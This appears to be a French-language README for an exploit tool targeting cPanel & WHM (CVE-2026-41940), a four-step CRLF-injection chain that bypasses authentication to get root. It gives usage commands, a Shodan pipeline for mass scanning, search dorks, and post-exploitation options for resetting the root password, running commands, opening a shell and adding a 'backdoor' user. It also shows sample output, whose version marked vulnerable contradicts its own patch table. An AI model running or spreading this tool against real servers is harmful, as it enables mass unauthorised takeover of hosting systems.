
cPanel & WHM - Contournement de l'authentification via injection CRLF dans le fichier de session
⚡ Root non authentifié – Injection CRLF dans le fichier de session ⚡
« Un seul enchaînement pour tous les gouverner. »
┌─────────────────────────────────────────────────────────────┐
│ Étape 1 ── Générer un cookie de session pré‑auth │
│ Étape 2 ── Injection CRLF via l'en-tête `Authorization` │
│ Étape 3 ── Déclencher `do_token_denied` (raw → cache) │
│ Étape 4 ── Vérifier l'accès root WHM via l'API JSON │
└─────────────────────────────────────────────────────────────┘
💥 Résultat – Accès root complet à WHM, sans aucune information d'identification.
Ce projet est publié sous la licence MIT – libre à vous de l'utiliser, de le modifier et de le distribuer, mais ne soyez pas malveillant 😈.
Consultez le fichier LICENSE pour plus de détails.
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940
Zéro dépendance – uniquement la bibliothèque standard de Python 3.
Pas besoin depip,virtualenvou de tout ce bazar.
./CVE-2026-41940.py -u https://target.com:2087
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30
Une fois la machine compromise, vous pouvez :
--action list--action passwd --passwd "h4ck3d!"--action cmd --cmd "id;whoami"--action shell (terminal WHM complet)--action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"cat /etc/passwd--action info$ ./CVE-2026-41940.py -u https://192.168.1.100:2087
Configuration :
Cibles : 1
Threads : 10
Délai : 15s
Action : analyse uniquement
[10:23:15] [SCAN] Démarrage de la chaîne d'exploitation en 4 étapes... https://192.168.1.100:2087
[10:23:15] [INFO] Nom d'hôte canonique découvert : server.example.com
[10:23:15] [STEP] Étape 1/4 — Génération de la session pré‑auth...
[10:23:16] [ OK] Étape 1 : session pré‑auth = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] Étape 2/4 — Injection CRLF via l'en-tête Authorization...
[10:23:17] [ OK] Étape 2 : HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] Étape 3/4 — Déclenchement du gadget do_token_denied (raw→cache)...
[10:23:18] [ OK] Étape 3 : HTTP 401 — gadget do_token_denied déclenché
[10:23:18] [STEP] Étape 4/4 — Vérification de l'accès root WHM...
[10:23:18] [INFO] Étape 4 : HTTP 200 {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 CONFIRMÉ — Accès root WHM ! (v11.118.0.63 — CONFIRMÉ vulnérable)
[10:23:18] [PWND] Token : /cpsess1234567890
[10:23:18] [PWND] Session : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND] Version : 11.118.0.63
[10:23:18] [PWND] URL API : https://192.168.1.100:2087/cpsess1234567890/json-api/version
CVE-2026-41940 — Analyse terminée
Temps : 3,2 s · Cibles : 1
1 CIBLE VULNÉRABLE(S)
[*] Cible : https://192.168.1.100:2087
[*] Version : 11.118.0.63
[*] Token : /cpsess1234567890
[*] URL API : https://192.168.1.100:2087/cpsess1234567890/json-api/version
[*] Session : 9a7f8e3d2c1b0a9f
[*] Preuve : {"version":"11.118.0.63",...}
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
Toutes les versions inférieures à ces builds sont vulnérables.
0xgh057r3c0n – chercheur en sécurité, ingénieur en rétro-ingénierie et accro au café.
GitHub | Twitter
Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives.
L'accès non autorisé à des systèmes informatiques est illégal. L'auteur et les contributeurs ne sont pas responsables de toute utilisation abusive ou de tout dommage causé par ce logiciel.
Utilisez-le de manière responsable et obtenez toujours une autorisation au préalable.
🔥 Piratez la planète, mais restez dans la légalité. 🔥
| Option | Description |
|---|
-u, --url | URL de la cible unique (ex. https://host:2087) |
-l, --list | Fichier contenant une URL par ligne |
--hostname | Remplacer le nom d'hôte canonique de l'en-tête Host (découverte automatique) |
-t, --threads | Nombre de threads (défaut : 10) |
--timeout | Délai d'expiration en secondes (défaut : 15) |
--rate-limit | Pause entre les cibles (secondes) |
--action | Post-exploitation : list, passwd, cmd, exec, info, version, shell, adduser |
--passwd | Nouveau mot de passe root (avec --action passwd) |
--cmd | Commande système (avec --action cmd/exec) |
--new-user | Nouveau nom d'utilisateur cPanel (avec --action adduser) |
--new-domain | Nouveau domaine cPanel (avec --action adduser) |
-o, --output | Enregistrer les résultats au format JSON |
| Branche | Build corrigé | Statut |
|---|
| 11.110 | 11.110.0.97 | 🛡️ Corrigé |
| 11.118 | 11.118.0.63 | 🛡️ Corrigé |
| 11.126 | 11.126.0.54 | 🛡️ Corrigé |
| 11.132 | 11.132.0.29 | 🛡️ Corrigé |
| 11.134 | 11.134.0.20 | 🛡️ Corrigé |
| 11.136 | 11.136.0.5 | 🛡️ Corrigé |